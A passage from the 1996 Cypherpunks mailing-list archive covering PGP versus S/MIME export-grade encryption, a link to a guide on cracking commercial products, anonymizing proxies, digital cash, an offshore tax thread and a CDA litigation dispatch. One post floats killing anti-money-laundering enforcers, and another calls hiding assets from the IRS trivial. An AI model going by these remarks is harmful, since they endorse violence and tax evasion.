> Anybody else have any more information?
> 
> If this whole thing is a spoof, it made it into the SJMN.

   Word of this has been buzzing for a few months. I first heard about
it at Sandy's party, for instance, and then there was that (somewhat
distorted) Usenet post by Vesselin Bontchev.

   Having a PGP Inc. could be either fantastic or a disaster. Phil has
shown remarkably bad business judgement in the past, so hopefully they
have installed real managers and will allow Phil to take a figurehead
role, which is one thing he's fairly good at.

   The main problem with PGP has been that there just haven't been
enough people working on it. The PGP development process isn't very
conducive to volunteers, either. I know I'm not the only one who joined
the team, enthusiastic to get 3.0 off the ground, only to leave shortly
thereafter, frustrated by lack of progress, lack of clear direction, and
a design that was growing increasingly more complex without solving some
of the most basic problems for users.
   Since Derek has joined the team, things are a little better, although
I still feel that there just isn't enough humanpower on the team. An
influx of money may very well change that. Let's hope so.

   Meanwhile, the biggest threat against PGP is S/MIME. In the time that
the PGP team farted around trying to define an API for 3.0, the S/MIME
people (starting more or less from scratch), came up with a new message
format, significant improvements to the X.509 certification hierarchy,
got major support from many, many vendors, and got the damn thing
implemented. S/MIME products will begin shipping early this summer.

   Recently, I've been spending more or less equal amounts of time in
the PGP and S/MIME worlds. The difference is startling. S/MIME gives the
impression that it's _happening._ From PGP, I mostly get the message,
"wait for 3.0, when that comes out it will solve your problems."
   The corporate world must feel this just as intensely as I do. For a
typical example of PR journalism that nonetheless captures the feelings
of the people in corporations who are actually deploying crypto, see:

      http://www.deming.com/press/cw040896.htm

   The final paragraph reads:

   "Observers say SMIME's capabilities will let it replace software
   based on the PGP code, which is widely used. Unlike SMIME, which uses
   a structured certificate heirarchy, PGP relies on pre-certification
   of clients and servers for authentication, a limitation SMIME doesn't
   face."

   The gravest weakness of S/MIME, on the other hand, is the fact that
it defaults to 40-bit encryption, without any way of automatically
upgrading the quality. I estimate that this will result in a few percent
of all S/MIME messages being encyrpted with anything better. This
estimate is based on deployment figures from SSL. For example, Sameer
Parekh determined that 94.5% percent of the accesses to his SSL-enabled
Web server used 40-bit encryption. There are two reasons to believe that
S/MIME will do even worse. First, SSL _does_ have an automatic
negotiation mechanism to select the best cipher, which S/MIME lacks.
Second, most SSL servers deployed are configured for 128-bit ciphers,
thus it is only necessary that one client has 128-bit encryption for
that to be selected. However, for S/MIME, both the sender's and the
receiver's clients must have 128-bit encryption. If _either_ one is
"export grade", then 40-bits must be used.
   Thus, it's a reasonable guess that almost all S/MIME messages that
pass through the wires will offer "virtually no protection," to quote a
phrase from a paper co-authored by the principal designer of S/MIME's
encryption algorithms
(http://www.bsa.org/policy/encryption/cryptographers.html).

   Best of luck for PGP Inc.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 6 May 1996 03:27:54 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Web page for breaking commercial encryption?
Message-ID: <199605051540.IAA00176@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Bokler's Guide to Cracker Software is pretty comprehensive:

http://www.hiwaay.net/bokler/bsw_crak.html

>I am looking for a web page that shows how to break the encryption in many
>commercial products.  I have seen information on breaking a number of
>different products, but I can't find a web page that collects these methods
>into one place.  Seems there should be such a page.  Is there such a web
>page?  If not, is anyone willing to start one and give me a URL?  :-)
>
>Thanks,
>
>   -- Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 6 May 1996 03:58:40 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <m0uG5wv-00092KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:26 AM 5/5/96 -0400, Duncan Frissell wrote:

>Even though the population of those who regularly violate federal tax laws
>is smaller (20 million?) the records show that even for this population the
>odds of being convicted are approximately the odds of being nurdered.


Hmmmm.   Now that's a crime I hadn't heard of.  Tell me more!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 5 May 1996 23:53:31 +0800
To: cypherpunks@toad.com
Subject: Web page for breaking commercial encryption?
Message-ID: <Pine.LNX.3.91.960505083810.17779B-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




I am looking for a web page that shows how to break the encryption in many
commercial products.  I have seen information on breaking a number of
different products, but I can't find a web page that collects these methods
into one place.  Seems there should be such a page.  Is there such a web
page?  If not, is anyone willing to start one and give me a URL?  :-)

Thanks,

   -- Vince

PS  This is just for a link in my web page, no I did not forget 
    my lotus notes password or something. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 04:05:42 +0800
To: cypherpunks@toad.com>
Subject: Re: WWW proxies?
Message-ID: <v02120d03adb27fe340c9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:30 5/5/96, Lou Poppler wrote:
>On Fri, 26 Apr 1996 19:13:06 -0400 (EDT),
>Black Unicorn <unicorn@schloss.li> wrote:
>}
>} Has anyone developed such a beast yet?
>
>I know of two anonymizing web proxies.  See:
>http://hplyot.obspm.fr:6661/            and:
>http://anonymizer.cs.cmu.edu:8080/
>
>I think both sites offer source for what they are doing.
>I've used the Observatory de Paris site a few times as http_proxy.
>Last I checked, the Carnegie-Mellon site only serves requests from
>*.cmu.edu clients.

Of course these sites are in an ideal position to log their user's every
move. With so many users making all their http requests through a single
site, the commercial value of the information that could be gained by
logging traffic at the site is tremendous.

Only when a network of anonymizing sites is connected through something
like PipeNet and the users are either PipeNet nodes themselves, or at least
randomly use various PipeNet nodes for their http connections, does the
security of the user increase.

With only one hop, IMHO, the potential risk outweighs the potential
benefit. I'd advise against using such single-hop http anonymizers. YMMV.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 6 May 1996 00:49:16 +0800
To: cypherpunks@toad.com
Subject: Re: Web page for breaking commercial encryption?
In-Reply-To: <Pine.LNX.3.91.960505083810.17779B-100000@offshore.com.ai>
Message-ID: <Pine.LNX.3.91.960505093147.18054A-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




So with a bit more time in Alta Vista I found it.  And it is a nice page. 
Has 12 commercial products and how to break them.  Check out: 

   http://www.hiwaay.net/bokler/bsw_crak.html

  --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 May 1996 05:13:40 +0800
To: cypherpunks@toad.com
Subject: Religious Wars Considered OK
Message-ID: <adb22cbe06021004aede@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I think the "religious war" involving Java, C++, applets, security models,
Unix, and Netscape is _fine_ for this list.

A heretical view, perhaps, to applaud a religious war, but the topics are
certainly germane to this list. Some may argue that
"comp.lang.java.advocacy" or "comp.lang.flames" are better places to have
this debate, but I think not. Here on this list we have Netscape
represented, users of major tools to develop crypto applications, and many
with concerns about security.

That Victor Boyko wrote such a concise summary of his objections to Java
vis-a-vis C++, and that Wei Dai was planning to write such a summary until
he saw Victor's summary, says that debate is robust.

So long as the "religious war" does not devolve to mere invocations of
deities, we're OK. In fact, to tell the truth, call this debate a
"religious war" is probably incorrect.

Few debates are more important than this one.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 6 May 1996 06:27:53 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605051818.LAA13734@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:53 AM 5/4/96 -0700, Sandy Sandfort wrote:
> What Black Unicorn writes is quite
> correct IF ONE IS CONCERNED WITH LEGAL CORRECTNESS.

And if the IRS is concerned with legal correctness.

I note that a number of ingenious and popular tax minimization
gimmicks have in the end failed to benefit anyone other than 
their promoters.

When you need a pallet and a forklift truck to carry the tax
code, it does not matter much what the books say.

The more bits of paper you send the IRS, the more they know
about you.  The more they know about you, the more they can
shake you down.

Sending ingenious and unusual bits of paper crafted by a clever
lawyer merely alerts them to the smell of money.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 6 May 1996 06:25:02 +0800
To: "E. ALLEN SMITH" <shamrock@netcom.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <199605051818.LAA13740@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>>It is true that the issuer is unable to discover that double blinding is
>>being used. The real problem with the protocol is that it requires
>>payor/payee collusion, which may make it difficult to execute.

At 07:58 PM 5/4/96 EDT, E. ALLEN SMITH wrote:
>	Can the payee discover that the payor isn't colluding before the bank
>can figure out who the payee is?

If the payor is not colluding, then the payee will immediately discover
he has not been paid, because the checksums are wrong, and his software
says "bad payment"

If the payor is colluding, then no matter what he reveals to the bank,
the bank cannot discover the payee.  Note that with payee anonymity,
the payee does not have to promptly check in his money, so the bank
has no hope of narrowing the search by coincidence in time.

But if the payee is colluding, then the payor can be detected by 
coincidence in time.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 6 May 1996 07:44:13 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Money Laundering Conference with Government Types
Message-ID: <m0uG9Po-00095iC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 PM 5/5/96 -0400, Black Unicorn wrote:
>On Sat, 4 May 1996, jim bell wrote:

>> >   Money Laundering and Asset Forfeiture are critical consequences for
>> >   the banks, attorneys, securities dealers and corporations, both
>> >   domestic and international, who may be inadvertently in
>> >   non-compliance. _Our program will give you:_
>> 
>> I wonder how long it's going to take before these "money-launderers" learn 
>> that by taking, say, 10% of the amount of money they launder in one year, 
>> they can eliminate the people trying to stop them.  Forever.
>
>Been done.  See e.g., Pablo Escobar.  

Nah, what happened to Escobar was a business falling-out.  His business partners, the thugs in the US and Colombian governments, provided the illegality of drugs, a necessary element in keeping profits up.  Escobar provided the drug trafficking, a necessary element in keeping thug...er...police employment high.  It was a great system; worked for years and is still generally operational.  Escobar must have done something to upset the arrangement, like refusing to pay off his handlers or maybe going out of business, etc.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 05:17:45 +0800
To: jamesd@echeque.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199605050410.VAA14391@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.93.960505130245.1943A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996 jamesd@echeque.com wrote:

> At 01:54 AM 5/4/96 -0400, Black Unicorn wrote:
> > Actually, I disagree with Mr. Sandfort on this one.
> >
> > Taxation of International Income is a tremendously complicated field.
> > (You can get an LL.M. in international taxation alone for example).
> 
> I do not believe the IRS particularly cares what all those tons of 
> tax legislation books say, and I am sure they do not know.
> 
> Unicorn seems to be thinking in terms of constructing magic pieces 
> of paper that will protect you from the bad boys, whereas Sandy is 
> thinking in terms of making sure the bad boys cannot find your money.

The issue at hand was legal and non-tax evasion type advantages.  If by
"bad-boys" you mean private plaintiff's, then your position might apply to
the question at hand.  If, on the otherhand, it refers to the IRS or
government types, it won't.

The IRS may or may not know what's in the tax legislation books, or the
code or the regulations which the treasury itself submits.  This is not
the point.  The point, in legal tax avoidance cases, (as distinguished
from illegal ones) is that _you the taxpayer_ know, and can defend your
actions during process.

> While doubtless magic bits of paper are useful to some extent if 
> you are a genuinely multinational corporation, if the bad boys 
> see smaller fry carefully concocting magic paper they will say 
> "ah, tax haven", jump on you like a ton of bricks, extort information 
> from anyone in their jurisdiction as to where your money is (which 
> is why Sandy recommends a lawyer who works OUTSIDE the jurisdiction) 
> and confiscate all your assets and not give them back until you can 
> prove you have paid taxes on everything you might possibly have 
> earned and some things you could not possibly have earned.

Again, the author was not asking for tax evasion advice, but tax avoidance
advice.

In any event, I'm not talking about technicalities or "magic pieces of
paper," but rather utilizing the loopholes that are built into the tax
process to your advantage.  There are small loopholes in which you might
get your head stuck, and larger ones that pose little or no risk, and
still larger and intended policy oriented ones which are literally
sanctioned by the authorities.  Many of these are as available to the
small taxpayer as to a MNE.

God knows I've written enough about illegal asset concealing, but that's
not the issue here.

Replies to e-mail would probably be prudent.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 05:14:19 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Money Laundering Conference with Government Types
In-Reply-To: <m0uFuoc-00095MC@pacifier.com>
Message-ID: <Pine.SUN.3.93.960505131323.1943B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, jim bell wrote:

> At 08:26 PM 5/4/96 EDT, E. ALLEN SMITH wrote:

> >   _It's not enough to BE clean -- You must also LOOK clean._
> >   
> >   Money Laundering and Asset Forfeiture are critical consequences for
> >   the banks, attorneys, securities dealers and corporations, both
> >   domestic and international, who may be inadvertently in
> >   non-compliance. _Our program will give you:_
> 
> I wonder how long it's going to take before these "money-launderers" learn 
> that by taking, say, 10% of the amount of money they launder in one year, 
> they can eliminate the people trying to stop them.  Forever.

Been done.  See e.g., Pablo Escobar.  Visit his new residence at Santa
Cisto Graveyards.

> Jim Bell
> jimbell@pacifier.comJim Bell
> jimbell@pacifier.com

MPD acting up?  :)

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 05:53:54 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <199605050623.XAA17801@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.93.960505132252.1943D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Bill Frantz wrote:

> The more I think about Senator Leahy's public key, the more I keep coming
> back to a point I only alluded to before.
> 
> How do we know the key is actually his key?
> 
> The key is only self signed.  It could be a fake.  If, as I have assumed,
> its primary use will be to sign public statements posted to the net, how
> will we know they are actually from Senator Leahy, and not some impostor?
> 
> I strongly urge the senator to join the web of trust and get some other
> signatures on his key.

I'll visit his office and ask if he wants he key signed this week.

> 
> 
> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 06:22:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb163b00102100471cc@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960505133203.1943H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Timothy C. May wrote:


[Much about Mr. May's taxes and methods of filing as well as
interesting discussion about entitlements and taxes deleted]

> One area where I mostly agree with Jordan Hayes and disagree with Sandy,
> Uni, and Duncan, is that I don't think it's as easy as they sometimes claim
> it is to avoid taxes by the offshore stratagems they espouse. Believe me, I
> looked into this a while back (it is never illegal to investigate ways to
> minimize tax burdens), and even considered moving out of the U.S. to a tax
> haven of some sort.

You don't have to disagree with me here.  I've said this all along.  It
can be expensive and difficult to set up a system to reduce tax offshore.
But the expense is mostly in setup costs and very front ended.  Once a
structure is in place, it's not that hard to continue to benefit.

> It turns out, as it does for many people I know, that my assets are
> relatively traceable. Salaries and even consulting fees are reported
> assiduously. Stocks can certainly be moved offshore, but the IRS obviously
> knows where they are (the institutions that keep records of stock ownership
> will tell them, for one thing...this may take a few years for the records
> to catch up, but they ultimately will).

I have to strongly disagree here.  But now you're talking about evasion,
not avoidance.  It's trivial to hide stock ownership from the IRS.  This
is perhaps one of the easiest things one can do.  Consulting fees?  These
too can be concealed.  It takes more work, but its possible.

> Certainly I could liquidate one form of my assets (stocks, real estate,
> etc.) and simply move the money out of the country. Tax evasion is always
> an option. But the price paid if one gets caught tends to be rather high.

Were you to liquidate and move out of the country and renounce
citizenship, and consult from abroad, and if you did this properly with
your t's crossed, you could very easily and legally avoid (not evade) U.S.
tax.  The question is whether this is an option for you or not for other
practical reasons.

> (Despite what you hear anecdotally about the IRS "settling" for pennies on
> the dollar.)

The IRS almost never settles like this.  Not in my experience anyhow,
unless they have a feeling that an aggressive auditor was over zealous
with your returns (and this should have been caught before you get to the
settlement phase in any event).

> Call me a skeptic.

You're a skeptic, but a reasonable skeptic.

You have an idea about what you're willing to spend, and what your willing
to "pay."  Your decision seems to be (quite logically) based on those
factors.

> I will do my best not to be drawn into a debate that has been held here
> several times before. If Sandy, Duncan, etc., believe it is so easy to
> avoid taxes--on the resources we are talking about, not sheltering small
> amounts--or if they claim that I am obviously not following their advice,
> I'll let them make these claims without any attempt to rebut them. I've
> been there and done that before.

I'll not claim its easy, and I know too little about your financial
situation to make specific recommendations.  (This is not, by the way, an
invitation for discloseure of anyone's financial dealings).  I
will say it's possible, and your mileage will depend on several factors.
How much you're willing to spend.  What you're willing to risk.  How risky
you want to get. etc. etc.  The nature of some people's business
makes it costly, others, who have mostly passive income, have an
easier time of it.

> I have no doubt that "tax planning" works for some people, and I think
> certain people like Vince Cate may do well in places like Anguilla,
> essentially starting a business from scratch. I even have longterm hopes
> for tax havens, cyberspace tax havens, anonymous systems, etc. But this
> ain't happening soon.

Here I'm not so sure I agree.  Several of us are working on making it
happen, soon.

> But I see no clear way that X shares of Apple, Y shares of Sun, Z shares of
> Intel, etc. can be converted into other forms without taxes being paid, or
> evaded. (Evaded, not avoided.)

Expatriate, have your expatriation pass the "Furstenburg" test and be
certified as being made for non-tax avoidance reasons, and you will pay
$0.00 in capital gains when you liquidate.

Should you be unable to pass the "Furstenburg" test, you can still enjoy
your dividens for 10 years before liquidating tax free.

If you don't want to wait 10 years, you can do a installment sale of your
stock via an exchange mechanism, tax free.

All 100% legal, until the Clinton "Death on expatriation" tax reform bill
passes and is signed.

> I recall Sandy claiming some scheme where I
> would use my shares as collateral and borrow tax-free against them. Sure,
> it's what I do everyday with my margin account. But to ultimately pay off a
> margin debt by selling assets involves taking capital gains (if there were
> any, of course--a safe bet in the last 10 years), and at this point the IRS
> and California Franchise Tax Board want their 40-45% cut.

I don't know what Mr. Sandfort suggested exactly, but I suspect he was
talking about an exchange of stock for debt instruments.  In some cases
such an exchange can be a non-realization event.  A form of this is one
way IPO execs still get cash from their options without being able to
exercise them and thus avoid the time restrictions on sale of stock and
condequently, often the realization of such sale.  I have to brush up on
my U.S. tax to tell you exactly when this works.  Let me know if anyone is
interested.

> Not being prepared to risk imprisonment for tax evasion, and being desirous
> of living in the United States rather than on a coral atoll, I answer the
> questions that Macintax asks me, gulp when I see the final figure, and
> write out a check (which I then have to sell even more stock to
> cover...perpetuating the cycle).

Coral Atolls are not the only jurisdictions you can live in and enjoy low
or no tax.  Consider Monoco, Liechtenstein and Panama for starters.

Imprisonment is another matter.  None of my clients have ever gone to
prison, only one has ever been audited.  (Issue was recommended for 
referal then dropped for lack of evidence)  Then again, I don't have as
many clients now as I once did.

Is it easy to minimize taxation?  No.  The United States has intentionally
made it so.  Is it impossible?  No.  Never will be.

Part of the problem is inertia.  There is a (not unreasonable) view that
taxes to the extent that the U.S. imposes them are a fact of life and that
no efforts can mitigate them which will not cost more to implement than
will be saved.  The truth of this view varies in degree with each
taxpayer.

As to the future, I predict powerful tax evasion options at the click of a
WWW button in 2-3 years.  Not that I would ever advise anyone to break
U.S. law.

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 6 May 1996 07:12:18 +0800
To: cypherpunks@toad.com
Subject: F-C CDA Dispatch #9: Battle of the Briefs
Message-ID: <8lXD6G200YUzMAJ2ZD@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain





-----------------------------------------------------------------------------
                        Fight-Censorship Dispatch #9
-----------------------------------------------------------------------------
                  The CDA Challenge: Battle of the Briefs
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this update: Anti-porn groups egg on the Justice Department
                Confusion in the ranks: What's indecent?
                Theocratic right cites Rimm study in pro-CDA journal article
                Broad coalition files pro-ACLU brief
                What's next?


MAY 4, 1996 -- The CDA is a "work of art" that "is sensitive to the
First Amendment," Bruce Taylor and Cathy Cleaver argue in an amicus
brief supporting the DoJ filed in Philadelphia earlier this week.

The two longtime anti-pornsters submitted this weighty 85-page legal
document -- complete with over 100 pages of attachments including Jake
Baker's notorious snuff story -- on Monday, the same day the ACLU,
ALA, and the DoJ submitted their post-trial briefs, findings of fact,
and proposed conclusions of law.

I had asked Enough is Enough! to FedEx me the Taylor/Cleaver draft,
but The Brucester himself showed up at my office with a copy the next
afternoon, chipper and grinning and bouncing about. ("Hide your porn!"
he yelled as he walked in.) Taylor was in town for smut-research and
he clearly was proud of his completed legal object d'art.

What else could it be, with such delectable oeuvres as this:

  Expecting children to locate hidden Easter eggs sounds reasonable
  and enjoyable, unless those who have hidden the eggs are aware that
  they are rotten. No reasonable person, who cares about the
  well-being of children, would leave it up to children to find and
  dispose of rotten eggs. In the world of online communications,
  parents will be left as children, hunting frantically for thousands
  upon thousands of rotten eggs in a cyberworld of indecency,
  scurrying to find all of them before children are contaminated. [p35]

The arguments advanced in the brief -- a joint venture of Morality in
Media, the National Law Center for Children and Families, the Family
Research Council, Enough is Enough!, and the National Coalition for
the Protection of Children and Families -- center around one concept:
indecency means pornography.

That idea stinks like, well, a rotten egg. Their argument, which
mirrors the DoJ's, goes as follows:

  1. The CDA merely "updates" and "amends" Federal obscenity statutes
     and dial-a-porn laws.
  2. All the CDA does is require adults who use "patently offensive"
     sexual expression to "put electronic blinder racks" in front of
     their "pornography."
  3. The test for "indecency" is not vague or overbroad and does not
     apply to "serious works of literature, art, science, and politics."
  4. What is indecent "is well known to the public and the operators of
     mass communications media facilities." (If "indecency" is too
     vague, the CDA is unconstitutional.)
  5. The court has an obligation "to interpret these sections
     narrowly." That is, the three-judge panel should *reinterpret*
     the CDA to affect only "prurient pornography." Taylor calls this
     "judicial narrowing," and when I spoke with him he insisted that
     it was what the court will do.

Equating "indecency" with "pornography" is misleading, since courts
have held that George Carlin's monologue and Allen Ginsberg's poetry
can be regulated as indecent. As cyberlibertarian attorney Harvey
Silverglate writes on the fight-censorship mailing list:

  My objection to the current debate is that they talk of "smut."  My
  client, Allen Ginsberg, wants to broadcast some of the finest poetry
  written this century in this country.

The "family values" brief concludes:

  Purely selfish motivations based on one's desire to rebel against
  the "government" and be free from society's code of conduct in
  "cyberspace" is NOT a legal justification that should be accepted by
  the courts...

  Criminal laws against distributing pornography to children have
  literally saved countless lives. These lives are needed not for any
  threat posed by men of good will, but rather by those who would
  exploit the vulnerable and impressionable for their personal gain...
  Senators Exon and Coats deserve thanks from every family in America
  and the CDA deserves to be upheld.

Do I detect some pride of CDA authorship from Taylor and Cleaver?
Though the Hon. Jim Exon *does* deserve our thanks -- for retiring.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
               CONFUSION IN THE RANKS: WHAT'S INDECENT?
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The Justice Department and their anti-porn crusading allies can't even
agree on who should be locked up under the CDA.

On page 27 of his brief, Bruce Taylor cites the Amateur Action images
and Jake Baker's explicit rape-and-murder story as examples of
net.materials that are harmful to minors and that show "callous
disregard for public decency."

The EFF, a plaintiff in the ACLU coalition lawsuit, has Baker's story
on its web site and has made it clear in an affidavit that they
distribute such material online in the context of legal discussions.

But the DoJ says in their post-trial brief filed on Monday: "It can be
said that none of the plaintiffs' Web sites appear to engage in the
type of speech which Congress has targeted in the CDA."

So does Baker's story violate the CDA or not? Do you believe Taylor, a
former Cleveland city prosecutor, a former senior trial attorney in
the Child Exploitation and Obscenity Section of the Criminal Division
of the DoJ -- a guy who crows that he played "a central role in the
development and passage" of the CDA?

Or the DoJ attorneys, who are charged with enforcing it??

Even the DoJ's own witnesses can't come up with a good working
definition, as the ACLU illustrates in their post-hearing brief:

  The responses offered by government witnesses Schmidt and Olsen to
  the Court's questions illustrated just how freewheeling the
  subjective, discretionary judgments of police and prosecutors would
  be... Dr. Olsen opined that any of "the seven dirty words" made
  famous by the Pacifica decision, or their synonyms, could be
  subject to [the CDA] and should therefore be "tagged," as should
  nudes even if displayed on a museum web site.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
      THEOCRATIC RIGHT CITES RIMM STUDY IN PRO-CDA JOURNAL ARTICLE
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Thanks to the American Center for Law and Justice, Marty Rimm's bogus
cyberporn study just won't die.

The ACLJ is a legal advocacy group for the theocratic right -- Pat
Robertson's response to the ACLU. Says Robertson: "Someone has got to
stop the ACLU in court, and that's what we're going to do." They're
trying -- the ACLJ submitted Yet Another amicus brief over a week ago
supporting the Justice Department's defense of the CDA.

In the latest issue of the Journal of Technology Law and Policy, the
ACLJ defends the CDA and uncritically cites Rimm's discredited study.
A clue to the quality, honesty, and integrity of the ACLJ's
scholarship can be found in the way the group argues that Rimm's
"research" and TIME magazine's cover story provide evidence of "smutty
sex and scatologica" and justification for net-regulation:

   {17} On June 26, 1995, Senator Charles Grassley spoke in support of
   his legislation, the "Protection of Children from Computer
   Pornography Act of 1995. [20] Speaking to the motivation for his
   bill, which would have amended the federal criminal code, Senator
   Grassley warned the Senate of "the availability and the nature of
   cyberporn." He advised the Senate on a Carnegie Mellon University
   study of visual images available on the Internet...

Note the ACLJ's convenient fiction of the "Carnegie Mellon Study." The
group never reveals that Rimm was an undergraduate passing himself off
as a faculty member, that his study has no credibility outside
theocratic right lobby groups, that the study itself is fraudulent,
and that CMU is investigating Rimm for ethical violations.

Somehow I'm not surprised that the authors of the ACLJ article, Jay
Alan Sekulow and James Matthew Henderson, overlooked those details.
Sekulow did not respond to email inquiries.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                   BROAD COALITION FILES PRO-ACLU BRIEF
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Last month a broad coalition of professional groups, academics, ISPs,
and individuals opposed to the CDA submitted a Brief of Amici Curiae
in support of the ACLU lawsuit and motion for a preliminary
injunction. That brief is now online.

Represented by the Philadelphia law firm of Schnader, Harrison, Segal
& Lewis, the coalition includes the Authors Guild, American Society of
